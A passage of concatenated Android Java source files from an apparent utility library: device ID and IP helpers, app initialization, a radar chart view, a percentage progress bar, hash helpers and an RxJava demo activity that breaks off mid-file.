     * @return the cached or newly generated UUID string
     */
    public static String getUniversalID(Context context) {
        String uuid = SharedPrefsHelper.get(Constants.PREFS_UUID, "");
        // FIX: the prefs default is "" (never null), so the original
        // `uuid == null` check could never pass and no UUID was ever created.
        if (TextUtils.isEmpty(uuid)) {
            final String androidId = Settings.Secure.getString(
                    context.getContentResolver(),
                    Settings.Secure.ANDROID_ID);
            try {
                // "9774d56d682e549c" is the well-known duplicated ANDROID_ID
                // reported by some devices/emulators; fall back to random.
                if (!"9774d56d682e549c".equals(androidId)) {
                    uuid = UUID.nameUUIDFromBytes((androidId).getBytes("utf8")).toString();
                } else {
                    uuid = UUID.randomUUID().toString();
                }
            } catch (Exception e) {
                uuid = UUID.randomUUID().toString();
            }
            SharedPrefsHelper.put(Constants.PREFS_UUID, uuid);
        }
        return uuid;
    }

    /**
     * @return the first non-loopback interface address found
     * (NOTE(review): despite the name this is not restricted to IPv6 —
     * link-local IPv6 or IPv4 addresses may be returned; confirm intent)
     */
    public static String getLocalIpv6Address() {
        try {
            for (Enumeration<NetworkInterface> en = NetworkInterface.getNetworkInterfaces(); en.hasMoreElements(); ) {
                NetworkInterface intf = en.nextElement();
                for (Enumeration<InetAddress> enumIpAddr = intf.getInetAddresses(); enumIpAddr.hasMoreElements(); ) {
                    InetAddress inetAddress = enumIpAddr.nextElement();
                    if (!inetAddress.isLoopbackAddress()) {
                        return inetAddress.getHostAddress().toString();
                    }
                }
            }
        } catch (SocketException ex) {
            LogUtil.e("WifiPreference IpAddress" + ex.toString());
        }
        return null;
    }

    /**
     * @return the first non-loopback, non-link-local interface address
     * (typically the device's IPv4 address), or null when none is found
     */
    public static String getLocalIpAddress() {
        try {
            for (Enumeration<NetworkInterface> en = NetworkInterface
                    .getNetworkInterfaces(); en.hasMoreElements(); ) {
                NetworkInterface intf = en.nextElement();
                for (Enumeration<InetAddress> enumIpAddr = intf.getInetAddresses(); enumIpAddr.hasMoreElements(); ) {
                    InetAddress inetAddress = enumIpAddr.nextElement();
                    if (!inetAddress.isLoopbackAddress() && !inetAddress.isLinkLocalAddress()) {
                        return inetAddress.getHostAddress().toString();
                    }
                }
            }
        } catch (SocketException ex) {
            LogUtil.e("WifiPreference IpAddress" + ex.toString());
        }
        return null;
    }

    /**
     * Queries the public (internet-facing) IP via the Taobao IP service.
     * Performs blocking network I/O — must not run on the main thread.
     *
     * @return the public IP, "" on a service/network error, or null on exception
     */
    public static String getInternetIP() {
        String ip = null;
        HttpURLConnection connection = null;
        BufferedReader reader = null;
        try {
            String address = "http://ip.taobao.com/service/getIpInfo2.php?ip=myip";
            URL url = new URL(address);
            connection = (HttpURLConnection) url.openConnection();
            connection.setUseCaches(false);
            if (connection.getResponseCode() == HttpURLConnection.HTTP_OK) {
                InputStream in = connection.getInputStream();
                reader = new BufferedReader(new InputStreamReader(in));
                String tmpString = "";
                StringBuilder retJSON = new StringBuilder();
                while ((tmpString = reader.readLine()) != null) {
                    retJSON.append(tmpString + "\n");
                }
                JSONObject jsonObject = new JSONObject(retJSON.toString());
                String code = jsonObject.getString("code");
                if (code.equals("0")) {
                    JSONObject data = jsonObject.getJSONObject("data");
                    ip = data.getString("ip");
                } else {
                    ip = "";
                    LogUtil.e("IP接口异常,无法获取IP地址!");
                }
            } else {
                ip = "";
                LogUtil.e("网络连接异常,无法获取IP地址!");
            }
        } catch (Exception exception) {
            LogUtil.e("GetNetIp() : exception = " + exception.toString());
        } finally {
            // FIX: the original leaked both the reader and the connection.
            if (reader != null) {
                try {
                    reader.close();
                } catch (Exception ignored) {
                }
            }
            if (connection != null) {
                connection.disconnect();
            }
        }
        return ip;
    }

    /**
     * @return whether external storage is currently mounted and writable
     */
    public static boolean isSdcardAvailable() {
        return Environment.getExternalStorageState()
                .equals(Environment.MEDIA_MOUNTED);
    }

    /**
     * @param path a filesystem directory path
     * @return the number of bytes available to this app at that path
     */
    public static long getAvailableBytesForDirectory(String path) {
        return new StatFs(path).getAvailableBytes();
    }

    /**
     * Formats a byte count as a human-readable size string.
     *
     * @param context any context (used for locale-aware formatting)
     * @param number  size in bytes
     * @return formatted size, e.g. "1.2 MB"
     */
    public static String formatSpaceSize(Context context, long number) {
        return Formatter.formatFileSize(context, number);
    }
}
<file_sep>package com.icenler.lib.feature;
import android.app.ActivityManager;
import android.app.Application;
import android.content.Context;
import android.os.StrictMode;
import com.android.volley.RequestQueue;
import com.android.volley.toolbox.Volley;
import com.icenler.lib.receiver.lifecycle.ApplicationLifecycleListener;
import com.icenler.lib.receiver.lifecycle.ExitAppReceiver;
import com.icenler.lib.utils.LogUtil;
import com.nostra13.universalimageloader.cache.disc.naming.Md5FileNameGenerator;
import com.nostra13.universalimageloader.core.ImageLoader;
import com.nostra13.universalimageloader.core.ImageLoaderConfiguration;
import com.nostra13.universalimageloader.core.assist.QueueProcessingType;
import com.nostra13.universalimageloader.core.download.BaseImageDownloader;
import com.squareup.leakcanary.LeakCanary;
import com.squareup.leakcanary.RefWatcher;
import java.util.List;
/**
 * Created by iCenler - 2015/7/13:
 * Description: Application entry point. Performs one-time, process-wide
 * initialization on startup: StrictMode (debug only), LeakCanary, the Volley
 * request queue and the Universal Image Loader.
 */
public class App extends Application {
    // Singleton reference to this Application instance.
    private static App mInstance;
    // LeakCanary watcher; RefWatcher.DISABLED in release builds.
    private static RefWatcher mRefWatcher;
    // Process-wide Volley request queue.
    private static RequestQueue mHttpQueues;
    // Tracks activity starts/stops to detect foreground/background switches.
    private ApplicationLifecycleListener mLiftListener;
    /**
     * @return the App singleton / global application context
     */
    public static App getInstance() {
        return mInstance;
    }
    /**
     * @return the memory-leak detection watcher
     */
    public static RefWatcher getRefWatcher() {
        return mRefWatcher;
    }
    /**
     * @return the global Volley request queue
     */
    public static RequestQueue getHttpQueues() {
        return mHttpQueues;
    }
    /**
     * @return true when the app is currently in the background
     */
    public boolean isBackground() {
        return mLiftListener.isBackground();
    }
    /**
     * Exits the application: broadcasts the exit intent so registered
     * activities can finish, then terminates the VM / process.
     * NOTE(review): Runtime.getRuntime().exit(0) terminates the VM, so the
     * killProcess() call below is most likely never reached — confirm the
     * intended shutdown order.
     */
    public void exitApp() {
        ExitAppReceiver.exitApp(this);
        Runtime.getRuntime().exit(0);
        android.os.Process.killProcess(android.os.Process.myPid());
    }
    @Override
    public void onCreate() {
        super.onCreate();
        // Guard against duplicate initialization when onCreate() runs in a
        // secondary process: bail out unless this pid belongs to the process
        // named after the main package.
        ActivityManager am = (ActivityManager) getSystemService(Context.ACTIVITY_SERVICE);
        List<ActivityManager.RunningAppProcessInfo> runningApps = am.getRunningAppProcesses();
        if (runningApps != null) {
            for (ActivityManager.RunningAppProcessInfo processInfo : runningApps) {
                if (processInfo.pid == android.os.Process.myPid()) {
                    if (!getPackageName().equals(processInfo.processName)) {
                        LogUtil.i(processInfo.processName);
                        return;
                    }
                }
            }
        }
        mInstance = App.this;
        mInstance.registerActivityLifecycleCallbacks(mLiftListener = new ApplicationLifecycleListener());
        initAllSdk();
    }
    // One-time SDK setup; StrictMode first so later initialization is checked.
    private void initAllSdk() {
        initStrictMode();
        installLeakCanary(this);
        initRequestQueues(getApplicationContext());
        initImageLoaderConfig(getApplicationContext());
    }
    // Enables StrictMode policies in debug builds only.
    private void initStrictMode() {
        if (Constants.DEBUG) {
            StrictMode.setThreadPolicy(new StrictMode.ThreadPolicy
                    .Builder()
                    .detectAll()
                    .penaltyLog()
                    .build());// disk reads/writes and network on the main thread
            StrictMode.setVmPolicy(new StrictMode.VmPolicy
                    .Builder()
                    .detectAll()
                    .penaltyLog()
                    .build());// memory-related checks (leaked closables, etc.)
        }
    }
    private void initRequestQueues(Context context) {
        mHttpQueues = Volley.newRequestQueue(context);
    }
    /**
     * Initializes the Universal Image Loader async image-loading framework.
     */
    private void initImageLoaderConfig(Context context) {
        ImageLoaderConfiguration.Builder config = new ImageLoaderConfiguration.Builder(context);
        config.threadPoolSize(3);// number of worker threads in the load pool
        config.threadPriority(Thread.NORM_PRIORITY - 2);
        config.denyCacheImageMultipleSizesInMemory();// cache only one size per image in memory
        config.memoryCacheSize(20 * 1024 * 1024);// memory cache 20 MiB
        config.diskCacheSize(50 * 1024 * 1024); // disk cache 50 MiB
        config.diskCacheFileCount(100);
        config.imageDownloader(new BaseImageDownloader(context, 5 * 1000, 30 * 1000)); // connectTimeout (5 s), readTimeout (30 s)
        config.diskCacheFileNameGenerator(new Md5FileNameGenerator());// how cache keys become file names
        config.tasksProcessingOrder(QueueProcessingType.LIFO);// processing order of the display queue
        config.writeDebugLogs(); // debug logging
        // Initialize ImageLoader with configuration.
        ImageLoader.getInstance().init(config.build());
        // The options below apply per call to displayImage(String uri, ImageView imageView, DisplayImageOptions options)
        // DisplayImageOptions.Builder options = new DisplayImageOptions.Builder();
        // options.showImageOnLoading(R.mipmap.ic_launcher); // placeholder shown while downloading
        // options.showImageForEmptyUri(R.mipmap.ic_launcher); // image shown when the URI is empty or invalid
        // options.showImageOnFail(R.mipmap.ic_launcher); // image shown when loading/decoding fails
        // options.cacheInMemory(true); // whether downloaded images are cached in memory
        // options.cacheOnDisk(true); // whether downloaded images are cached on the SD card
        // options.imageScaleType(ImageScaleType.EXACTLY_STRETCHED); // decode/scale type used for display
        // options.considerExifParams(true); // whether JPEG EXIF parameters (rotation, flip) are honored
        // options.bitmapConfig(Bitmap.Config.RGB_565); // bitmap decode config
        // options.decodingOptions(android.graphics.BitmapFactory.Options decodingOptions);// bitmap decoding options
        // options.delayBeforeLoading(int delayInMillis); // delayInMillis is the delay before the download starts
        // options.preProcessor(BitmapProcessor preProcessor); // process the bitmap before it enters the cache
        // options.resetViewBeforeLoading(true); // whether the view is reset before loading
        // options.displayer(new RoundedBitmapDisplayer(20)); // rounded corners with the given radius
        // options.displayer(new FadeInBitmapDisplayer(100)); // fade-in animation duration once loaded
        // options.build();
    }
    /**
     * Memory-leak detection tool: use RefWatcher.DISABLED in release builds.
     */
    private void installLeakCanary(Application app) {
        if (!Constants.DEBUG) {
            mRefWatcher = RefWatcher.DISABLED;
        } else {
            mRefWatcher = LeakCanary.install(app);
        }
    }
}
<file_sep>package com.icenler.lib.view.demo;
import android.content.Context;
import android.graphics.Canvas;
import android.graphics.Paint;
import android.graphics.Path;
import android.util.AttributeSet;
import android.view.View;
import com.icenler.lib.R;
import com.icenler.lib.utils.LogUtil;
import com.icenler.lib.utils.ScreenUtil;
/**
 * Created by Fangde on 2016/1/22.
 * Description: Spider-web (radar) chart example — to be refined and extended.
 * https://github.com/jiangzehui/polygonsview
 */
public class RadarView extends View {
    // Outer radius of the web (note original spelling "Raduis" is kept).
    private float mRaduis;
    // Angle between adjacent vertices, in radians (2*PI / shapeCnt).
    private float mAngle;
    private int centerX, centerY;
    // Number of polygon sides == number of data axes == number of rings.
    private int shapeCnt = 6;
    private int textSize = ScreenUtil.sp2px(12);
    // One label per axis.
    private String[] titles = {"A", "B", "C", "D", "E", "F"};
    // Per-axis value in percent (divided by 100 in drawRegion).
    private int[] percentFactor = {95, 80, 92, 88, 90, 85};
    private Paint mShapePaint;   // web outline (rings and spokes)
    private Paint mTextPaint;    // axis labels
    private Paint mRegionPaint;  // filled data region
    private Path mShapePath;
    public RadarView(Context context) {
        this(context, null);
    }
    public RadarView(Context context, AttributeSet attrs) {
        this(context, attrs, 0);
    }
    public RadarView(Context context, AttributeSet attrs, int defStyleAttr) {
        super(context, attrs, defStyleAttr);
        init();
    }
    /**
     * Initializes the paints, the shared path and the per-vertex angle.
     */
    private void init() {
        mShapePaint = new Paint(Paint.ANTI_ALIAS_FLAG);
        mShapePaint.setStrokeWidth(1);
        mShapePaint.setColor(getResources().getColor(R.color.color_grey_assist));
        mShapePaint.setStyle(Paint.Style.STROKE);
        mTextPaint = new Paint(Paint.ANTI_ALIAS_FLAG);
        mTextPaint.setTextSize(textSize);
        mTextPaint.setColor(getResources().getColor(R.color.color_ink));
        mRegionPaint = new Paint(Paint.ANTI_ALIAS_FLAG);
        mRegionPaint.setColor(getResources().getColor(R.color.color_blue_assist));
        mRegionPaint.setStyle(Paint.Style.FILL_AND_STROKE);
        mRegionPaint.setAlpha(180);
        mShapePath = new Path();
        mAngle = (float) (Math.PI * 2 / shapeCnt);
    }
    @Override
    protected void onSizeChanged(int w, int h, int oldw, int oldh) {
        // Radius is 90% of half the smaller dimension, leaving room for labels.
        mRaduis = (Math.min(w, h) >> 1) * 0.9f;
        centerX = w >> 1;
        centerY = h >> 1;
        LogUtil.d("Raduis: " + mRaduis + ", CenterX: " + centerX + ", CenterY: " + centerY);
        super.onSizeChanged(w, h, oldw, oldh);
    }
    @Override
    protected void onDraw(Canvas canvas) {
        drawPolygon(canvas);
        drawLine(canvas);
        drawText(canvas);
        drawRegion(canvas);
    }
    /**
     * Draws the concentric regular polygons (the web rings).
     *
     * @param canvas
     */
    private void drawPolygon(Canvas canvas) {
        // Spacing between consecutive rings.
        float dis = mRaduis / (shapeCnt - 1);
        for (int i = 1; i < shapeCnt; i++) {
            float r = dis * i;// current ring radius
            LogUtil.i("Current Radius: " + r);
            mShapePath.reset();
            for (int j = 0; j < shapeCnt; j++) {
                float x, y;
                if (j == 0) {
                    // Start vertex, on the positive-x axis.
                    x = centerX + r;
                    y = centerY;
                    mShapePath.moveTo(x, y);
                } else {
                    // Remaining vertices computed with trigonometry.
                    x = (float) (centerX + Math.cos(mAngle * j) * r);
                    y = (float) (centerY + Math.sin(mAngle * j) * r);
                    mShapePath.lineTo(x, y);
                }
                LogUtil.d("Point - " + j + " (" + x + ", " + y + ")");
            }
            mShapePath.close();
            canvas.drawPath(mShapePath, mShapePaint);
        }
    }
    /**
     * Draws the spokes from the center to each outer vertex.
     *
     * @param canvas
     */
    private void drawLine(Canvas canvas) {
        for (int i = 0; i < shapeCnt; i++) {
            mShapePath.reset();
            mShapePath.moveTo(centerX, centerY);
            float x = (float) (centerX + Math.cos(mAngle * i) * mRaduis);
            float y = (float) (centerY + Math.sin(mAngle * i) * mRaduis);
            mShapePath.lineTo(x, y);
            LogUtil.d("Point - " + i + " (" + x + ", " + y + ")");
            canvas.drawPath(mShapePath, mShapePaint);
        }
    }
    /**
     * Draws the axis labels just outside the web (24px past the radius).
     *
     * @param canvas
     */
    private void drawText(Canvas canvas) {
        Paint.FontMetrics fontMetrics = mTextPaint.getFontMetrics();
        float textHeight = fontMetrics.descent - fontMetrics.ascent;
        for (int i = 0; i < shapeCnt; i++) {
            float radian = mAngle * i;
            float baseX = (float) (centerX + Math.cos(radian) * (mRaduis + 24));
            float baseY = (float) (centerY + Math.sin(radian) * (mRaduis + 24));
            // Vertical offset to center text on its anchor point.
            float offsetY = (Math.abs(fontMetrics.ascent + fontMetrics.descent)) / 2;
            // Choose the baseline by which half-plane the label falls in.
            if (radian >= 0 && radian <= Math.PI) {
                canvas.drawText(titles[i], baseX, baseY + offsetY, mTextPaint);
            } else {
                canvas.drawText(titles[i], baseX, baseY, mTextPaint);
            }
        }
    }
    /**
     * Draws the filled data region scaled per axis by percentFactor.
     *
     * @param canvas
     */
    private void drawRegion(Canvas canvas) {
        mShapePath.reset();
        for (int i = 0; i < shapeCnt; i++) {
            float p = percentFactor[i] * 1.0f / 100;// percentage factor
            float x = (float) (centerX + Math.cos(mAngle * i) * (mRaduis * p));
            float y = (float) (centerY + Math.sin(mAngle * i) * (mRaduis * p));
            if (i == 0) {
                // At i == 0 the angle is 0, so y == centerY; moveTo(x, centerY)
                // is equivalent to moveTo(x, y).
                mShapePath.moveTo(x, centerY);
            } else {
                mShapePath.lineTo(x, y);
            }
            LogUtil.d("(" + x + ", " + y + ")");
        }
        mShapePath.close();
        canvas.drawPath(mShapePath, mRegionPaint);
    }
}
<file_sep>package com.multichannel;
/**
 * Created by Fangde on 2016/2/22.
 * Description: Placeholder tool listing the market channels used for
 * multi-channel APK packaging; main() only reports its own elapsed time.
 */
public class MultiChannelBuildTool {

    /** Channel identifiers written into per-market builds. */
    public static String[] channels = new String[]{
            "Qihoo_360",
            "Tencent_qq",
            "Baiudu",
            "Wandoujia",
            "Xiaomi"
    };

    public static void main(String[] args) {
        final long startTime = System.currentTimeMillis();
        final long elapsedMs = System.currentTimeMillis() - startTime;
        System.out.println(elapsedMs + " MS");
    }
}
<file_sep>package com.icenler.lib.view;
import android.content.Context;
import android.content.res.TypedArray;
import android.graphics.Canvas;
import android.graphics.Paint;
import android.util.AttributeSet;
import android.widget.ProgressBar;
import com.icenler.lib.R;
import com.icenler.lib.utils.ScreenUtil;
/**
 * Custom horizontal percentage progress bar, based on ProgressBar.
 * 1. Supports the standard ProgressBar attributes plus:
 *    - percentage text size, color, visibility and the blank offset around it
 *    - reached-bar color and height
 *    - unreached-bar color and height
 * 2. Attribute details: res/values/attr_progress_bar.xml - HorizontalProgressBarWithNumber
 */
public class HorizontalProgressBarWithNumber extends ProgressBar {
    private static final int DEFAULT_TEXT_SIZE = 10;
    private static final int DEFAULT_TEXT_COLOR = 0xFFFC00D1;
    private static final int DEFAULT_REACHED_COLOR = 0xFFFC00D1;
    private static final int DEFAULT_UNREACHED_COLOR = 0xFFD3D6DA;
    private static final int DEFAULT_REACHED_PROGRESS_BAR_HEIGHT = 2;
    private static final int DEFAULT_UNREACHED_PROGRESS_BAR_HEIGHT = 2;
    private static final int DEFAULT_TEXT_OFFSET = 3;
    /**
     * Shared paint used for all drawing.
     */
    protected Paint mPaint = new Paint();
    /**
     * Color of the percentage text.
     */
    protected int mTextColor = DEFAULT_TEXT_COLOR;
    /**
     * Size of the percentage text, in sp.
     */
    protected int mTextSize = ScreenUtil.sp2px(DEFAULT_TEXT_SIZE);
    /**
     * Blank space on either side of the percentage text, in dp.
     */
    protected int mTextOffset = ScreenUtil.dp2px(DEFAULT_TEXT_OFFSET);
    /**
     * Color of the reached (completed) portion of the bar.
     */
    protected int mReachedBarColor = DEFAULT_REACHED_COLOR;
    /**
     * Color of the unreached (remaining) portion of the bar.
     */
    protected int mUnReachedBarColor = DEFAULT_UNREACHED_COLOR;
    /**
     * Height of the reached portion, in dp.
     */
    protected int mReachedProgressBarHeight = ScreenUtil.dp2px(DEFAULT_REACHED_PROGRESS_BAR_HEIGHT);
    /**
     * Height of the unreached portion, in dp.
     */
    protected int mUnReachedProgressBarHeight = ScreenUtil.dp2px(DEFAULT_UNREACHED_PROGRESS_BAR_HEIGHT);
    /**
     * Usable drawing width (view width minus horizontal padding).
     */
    protected int mRealWidth;
    /**
     * Whether the percentage text is drawn.
     */
    protected boolean mIfDrawText = true;
    protected static final int VISIBLE = 0;
    public HorizontalProgressBarWithNumber(Context context) {
        super(context);
    }
    public HorizontalProgressBarWithNumber(Context context, AttributeSet attrs) {
        this(context, attrs, 0);
    }
    public HorizontalProgressBarWithNumber(Context context, AttributeSet attrs, int defStyle) {
        super(context, attrs, defStyle);
        this.setHorizontalScrollBarEnabled(true);
        getObtainStyleAttributes(attrs);
        mPaint.setTextSize(mTextSize);
    }
    /**
     * Reads the custom XML attributes into fields, keeping the defaults for
     * any attribute that was not set.
     *
     * @param attrs
     */
    private void getObtainStyleAttributes(AttributeSet attrs) {
        TypedArray attributes = getContext().obtainStyledAttributes(attrs, R.styleable.HorizontalProgressBarWithNumber);
        mTextColor = attributes.getColor(R.styleable.HorizontalProgressBarWithNumber_progress_text_color, mTextColor);
        mTextSize = (int) attributes.getDimension(R.styleable.HorizontalProgressBarWithNumber_progress_text_size, mTextSize);
        mTextOffset = (int) attributes.getDimension(R.styleable.HorizontalProgressBarWithNumber_progress_text_offset, mTextOffset);
        mReachedBarColor = attributes.getColor(R.styleable.HorizontalProgressBarWithNumber_progress_reached_color, mReachedBarColor);
        mUnReachedBarColor = attributes.getColor(R.styleable.HorizontalProgressBarWithNumber_progress_unreached_color, mUnReachedBarColor);
        mReachedProgressBarHeight = (int) attributes.getDimension(R.styleable.HorizontalProgressBarWithNumber_progress_reached_bar_height, mReachedProgressBarHeight);
        mUnReachedProgressBarHeight = (int) attributes.getDimension(R.styleable.HorizontalProgressBarWithNumber_progress_unreached_bar_height, mUnReachedProgressBarHeight);
        int textVisible = attributes.getInt(R.styleable.HorizontalProgressBarWithNumber_progress_text_visibility, VISIBLE);
        if (textVisible != VISIBLE) {
            mIfDrawText = false;
        }
        /* Give back a previously retrieved StyledAttributes, for later re-use. */
        attributes.recycle();
    }
    @Override
    protected synchronized void onMeasure(int widthMeasureSpec, int heightMeasureSpec) {
        /* specMode meanings, where specSize = MeasureSpec.getSize(heightMeasureSpec) */
        /* AT_MOST -- specSize is the maximum available space -- wrap_content */
        /* EXACTLY -- specSize is an exact size -- explicit value (or match_parent) */
        /* UNSPECIFIED -- 0 */
        int heightMode = MeasureSpec.getMode(heightMeasureSpec);
        if (heightMode != MeasureSpec.EXACTLY) {
            // wrap_content: height = padding + max(bar heights, text height).
            float textHeight = (mPaint.getFontMetrics().descent - mPaint.getFontMetrics().ascent);
            int exceptHeight = (int) (this.getPaddingTop() + this.getPaddingBottom() +
                    Math.max(Math.max(mReachedProgressBarHeight, mUnReachedProgressBarHeight), textHeight));
            heightMeasureSpec = MeasureSpec.makeMeasureSpec(exceptHeight, MeasureSpec.EXACTLY);
        }
        /*
         * Font metrics glossary:
         * baseline; ascender top (ascent or top); descender bottom (descent or bottom)
         * ascent: distance above baseline; descent: distance below baseline
         * leading: gap between one line's bottom and the next line's top
         * font height = ascent + descent
         * Ps: top and bottom are the maxima of ascent and descent; ascent and
         * top are negative values.
         * */
        // example:ÀÁÂABCfghijpqy
        /*
        Paint.ascent() = -66.83203
        Paint.descent() = 16.980469
        paint.getFontSpacing() = 83.8125
        Paint.getFontMetrics().ascent = -66.83203
        Paint.getFontMetrics().descent = 16.980469
        Paint.getFontMetrics().leading = 0.0
        Paint.getFontMetrics().top = -75.44531
        Paint.getFontMetrics().bottom = 19.511719
        */
        super.onMeasure(widthMeasureSpec, heightMeasureSpec);
    }
    @Override
    protected void onSizeChanged(int w, int h, int oldw, int oldh) {
        super.onSizeChanged(w, h, oldw, oldh);
        // Cache the real drawable width (width minus horizontal padding).
        mRealWidth = w - this.getPaddingRight() - this.getPaddingLeft();
    }
    @Override
    protected synchronized void onDraw(Canvas canvas) {
        boolean noNeedBg = false;
        canvas.save();
        // Draw relative to (paddingLeft, vertical center).
        canvas.translate(this.getPaddingLeft(), this.getHeight() / 2);
        String text = getProgress() + "%";
        float textWidth = mPaint.measureText(text);
        float textHeight = mPaint.getFontMetrics().descent + mPaint.getFontMetrics().ascent;
        float radio = this.getProgress() * 1.0f / this.getMax();
        float progressPosX = (int) ((mRealWidth - textWidth - mTextOffset) * radio + 0.5);
        // Clamp at the right edge; when the text reaches the end there is no
        // unreached segment left to draw.
        if (progressPosX + textWidth > mRealWidth) {
            progressPosX = mRealWidth - textWidth;
            noNeedBg = true;
        }
        // Reached (completed) segment.
        float endX = progressPosX - mTextOffset;
        if (endX > 0) {
            mPaint.setColor(mReachedBarColor);
            mPaint.setStrokeWidth(mReachedProgressBarHeight);
            canvas.drawLine(0, 0, endX, 0, mPaint);
        }
        // Percentage text.
        if (mIfDrawText) {
            mPaint.setColor(mTextColor);
            canvas.drawText(text, progressPosX, Math.abs(textHeight / 2), mPaint);
        }
        // Unreached (remaining) segment.
        if (!noNeedBg) {
            float start = progressPosX + mTextOffset + textWidth;
            mPaint.setColor(mUnReachedBarColor);
            mPaint.setStrokeWidth(mUnReachedProgressBarHeight);
            canvas.drawLine(start, 0, mRealWidth, 0, mPaint);
        }
        canvas.restore();
    }
}
<file_sep>NestedScrollingChild -> NestedScrollingParent
void setNestedScrollingEnabled(boolean enabled)
boolean isNestedScrollingEnabled()
boolean hasNestedScrollingParent() int getNestedScrollAxes()
boolean startNestedScroll(int axes) boolean onStartNestedScroll(
View child,
View target,
int nestedScrollAxes)
void onNestedScrollAccepted(
View child,
View target,
int nestedScrollAxes)
void stopNestedScroll() void onStopNestedScroll(View target)
boolean dispatchNestedPreScroll( void onNestedPreScroll(
int dx, int dy, View target,
int[] consumed, int dx, int dy,
int[] offsetInWindow) int[] consumed)
boolean dispatchNestedScroll( void onNestedScroll(
int dxConsumed, int dyConsumed, View target,
int dxUnconsumed, int dyUnconsumed, int dxConsumed, int dyConsumed,
int[] offsetInWindow) int dxUnconsumed, int dyUnconsumed)
boolean dispatchNestedFling( boolean onNestedFling(
float velocityX, float velocityY, View target,
boolean consumed) float velocityX, float velocityY,
boolean consumed)
boolean dispatchNestedPreFling( boolean onNestedPreFling(
float velocityX, float velocityY); View target,
float velocityX, float velocityY)<file_sep>package com.icenler.lib.utils;
import com.icenler.lib.utils.helper.StringHelper;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
/**
 * Created by iCenler - 2015/7/28:
 * Description: Common digest helpers (MD5 / SHA-1) returning hex strings.
 */
public class EncryptUtil {

    private static final String TYPE_MD5 = "MD5";
    private static final String TYPE_SHA1 = "SHA-1";

    private EncryptUtil() {
        throw new UnsupportedOperationException("cannot be instantiated");
    }

    /**
     * @param bytes data to digest
     * @return SHA-1 digest as a hex string, or null for null input
     */
    public static String makeSha1Sum(byte[] bytes) {
        return makeEncrypt(TYPE_SHA1, bytes);
    }

    /**
     * @param bytes data to digest
     * @return MD5 digest as a hex string, or null for null input
     */
    public static String makeMd5Sum(byte[] bytes) {
        return makeEncrypt(TYPE_MD5, bytes);
    }

    /**
     * @param type  digest algorithm name ("MD5" or "SHA-1")
     * @param bytes data to digest
     * @return hex digest, or null when input is null or the algorithm is missing
     */
    private static String makeEncrypt(String type, byte[] bytes) {
        if (bytes == null) {
            return null;
        }
        try {
            MessageDigest digest = MessageDigest.getInstance(type);
            digest.update(bytes);
            return StringHelper.byte2Hex(digest.digest());
        } catch (NoSuchAlgorithmException e) {
            e.printStackTrace();
            return null;
        }
    }
}
<file_sep>package com.icenler.lib.feature.activity;
import android.annotation.TargetApi;
import android.content.Context;
import android.graphics.Bitmap;
import android.graphics.Canvas;
import android.graphics.Color;
import android.graphics.Paint;
import android.graphics.Path;
import android.graphics.RectF;
import android.graphics.drawable.AnimatedVectorDrawable;
import android.graphics.drawable.Drawable;
import android.os.Build;
import android.util.AttributeSet;
import android.view.View;
import android.view.animation.Animation;
import android.view.animation.AnimationUtils;
import android.view.animation.Interpolator;
import android.view.animation.LinearInterpolator;
import android.view.animation.Transformation;
import android.widget.ImageView;
import android.widget.TextView;
import com.android.volley.VolleyError;
import com.icenler.lib.R;
import com.icenler.lib.common.RequestCallback;
import com.icenler.lib.common.VolleyRequest;
import com.icenler.lib.feature.base.BaseActivity;
import com.icenler.lib.utils.LogUtil;
import com.icenler.lib.utils.ScreenUtil;
import com.icenler.lib.utils.manager.ToastManager;
import com.jakewharton.rxbinding.view.RxView;
import com.jakewharton.rxbinding.view.ViewClickEvent;
import java.io.File;
import java.util.Map;
import java.util.concurrent.TimeUnit;
import rx.Observable;
import rx.Observer;
import rx.Subscriber;
import rx.android.schedulers.AndroidSchedulers;
import rx.functions.Action1;
import rx.functions.Func1;
import rx.schedulers.Schedulers;
// Demo/playground activity: animated-vector search icon morph, RxJava usage
// samples, Volley request samples, and a custom loading-indicator view.
public class TestActivity extends BaseActivity {
    private ImageView iv;
    private TextView text;
    // Vector drawables that morph the search icon into a bar and back.
    private AnimatedVectorDrawable searchToBar;
    private AnimatedVectorDrawable barToSearch;
    private float offset;       // translation applied when collapsed
    private Interpolator interp;
    private int duration;       // morph animation duration in ms
    private boolean expanded = false;
    @Override
    protected int doGetLayoutResId() {
        return R.layout.activity_test;
    }
    @Override
    protected void doInit() {
        iv = (ImageView) findViewById(R.id.search);
        text = (TextView) findViewById(R.id.text);
        searchToBar = (AnimatedVectorDrawable) getResources().getDrawable(R.drawable.svg_anim_search_to_bar);
        barToSearch = (AnimatedVectorDrawable) getResources().getDrawable(R.drawable.svg_anim_bar_to_search);
        interp = AnimationUtils.loadInterpolator(this, android.R.interpolator.linear_out_slow_in);
        duration = 400;
        // iv is sized to hold the search+bar so when only showing the search icon, translate the
        // whole view left by half the difference to keep it centered
        offset = -71f * (int) getResources().getDisplayMetrics().scaledDensity;
        iv.setTranslationX(offset);
    }
    // Toggles between the collapsed search icon and the expanded bar,
    // running the matching vector morph plus translation/alpha animations.
    @TargetApi(Build.VERSION_CODES.LOLLIPOP)
    public void animate(View view) {
        if (!expanded) {
            iv.setImageDrawable(searchToBar);
            searchToBar.start();
            iv.animate().translationX(0f).setDuration(duration).setInterpolator(interp);
            text.animate().alpha(1f).setStartDelay(duration - 100).setDuration(100).setInterpolator(interp);
        } else {
            iv.setImageDrawable(barToSearch);
            barToSearch.start();
            iv.animate().translationX(offset).setDuration(duration).setInterpolator(interp);
            text.setAlpha(0f);
        }
        expanded = !expanded;
    }
    // RxJava usage samples; never called from this activity's lifecycle.
    private void init() {
        // Revisiting RxJava:
        // list files -> keep .png -> decode -> deliver on main thread.
        File[] folders = new File[5];
        Observable.from(folders).flatMap(new Func1<File, Observable<File>>() {
            @Override
            public Observable<File> call(File file) {
                return Observable.from(file.listFiles());
            }
        }).filter(new Func1<File, Boolean>() {
            @Override
            public Boolean call(File file) {
                return file.getName().endsWith(".png");
            }
        }).map(new Func1<File, Bitmap>() {
            @Override
            public Bitmap call(File file) {
                return getBitmapFromFile(file);
            }
        }).subscribeOn(Schedulers.io())
                .observeOn(AndroidSchedulers.mainThread())
                .subscribe(new Action1<Bitmap>() {
                    @Override
                    public void call(Bitmap bitmap) {
                        // handled on the main thread
                    }
                });
        Observer<String> observer = new Observer<String>() {
            @Override
            public void onCompleted() {
            }
            @Override
            public void onError(Throwable e) {
            }
            @Override
            public void onNext(String s) {
            }
        };
        // Subscriber is an Observer subclass;
        // the difference is the extra onStart() hook.
